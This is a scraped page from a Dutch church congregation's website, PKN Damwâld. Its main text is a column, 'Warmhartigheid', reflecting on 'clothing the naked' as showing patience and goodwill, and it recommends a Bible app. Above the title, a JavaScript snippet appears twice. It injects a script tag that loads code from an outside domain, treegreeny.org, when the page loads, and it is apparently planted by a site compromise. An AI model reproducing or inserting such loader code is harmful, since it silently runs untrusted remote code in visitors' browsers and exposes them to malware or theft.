;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Warmhartigheid - PKN Damwâld

Warmhartigheid

Gepubliceerd op: woensdag 11 mei 2022

Ruim een week geleden kreeg ik een mailtje van Kees: heb je tijd om een column te schrijven? Eens in de 3 maanden ben ik aan de beurt, dus dat is prima te doen. Maar toch was ik het in de drukte nog weer vergeten. Na een vriendelijke reminder nu dan toch een poging. Op mijn vrije woensdagmiddag, onderuit op de bank met mijn laptop op schoot. Waar zal ik eens over schrijven? Ik bedenk dat ik wel de Mijn Bijbel app kan checken op een nieuwe blog of mooie quote. En ja hoor: een blog van Christien Crouwel, algemeen secretaris Raad van Kerken in Nederland. Hieronder een verkorte versie:

Ze gaat in op de werken van barmhartigheid, en dan de toepassing in de wereld van nu. Het begint met de tekst waarin God – kort na de zondeval – zich om de mensen bekommert. Adam en Eva voelen zich naakt, en “God maakte voor de mens en zijn vrouw kleren van dierenvellen en trok hun die aan”. (Genesis 3:21). Kunnen we ‘de naakten kleden’ ook zo verstaan? Dat we beseffen dat we allemaal minstens zo naakt als Adam en Eva zijn, met onze imperfecties en menselijke hebbelijkheden? Dat zou betekenen dat we meer geduld voor elkaar opbrengen en niet bij het minste of geringste in de hoogste gordijnen klimmen. Dan tellen we, na een domme tweet van iemand, eerst even tot tien in plaats van een emmer haatspraak over diegene uit te storten. En dan starten we geen burenruzie als onze buurman zijn schutting per ongeluk twee centimeter over onze erfgrens dreigt te plaatsen.

De ‘naakten kleden’ krijgt zo de betekenis: elkaar het voordeel van de twijfel gunnen. Dan hangen we de ander een echte mantel van liefde om. Geen mantel die fouten verdoezelt en toedekt wat het daglicht niet verdragen kan, maar één die ‘het kwade niet aanrekent’ (1 Korintiërs 13:5). Die mantel is geweven van ‘warmhartigheid’. Want zulke mantels passen altijd. Ook zonder elkaar de maat te nemen.

Dat bericht geef ik jullie graag mee. Dat, en de Mijn Bijbel app van het Nederlands Bijbelgenootschap. Daarin vind je niet alleen de Bijbelboeken, maar ook nieuws, boeken, blogs en leesplannen. Gratis te downloaden, dus wat let je? Veel leesplezier én warmhartigheid allemaal!

 

 

Columnist:Janet

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns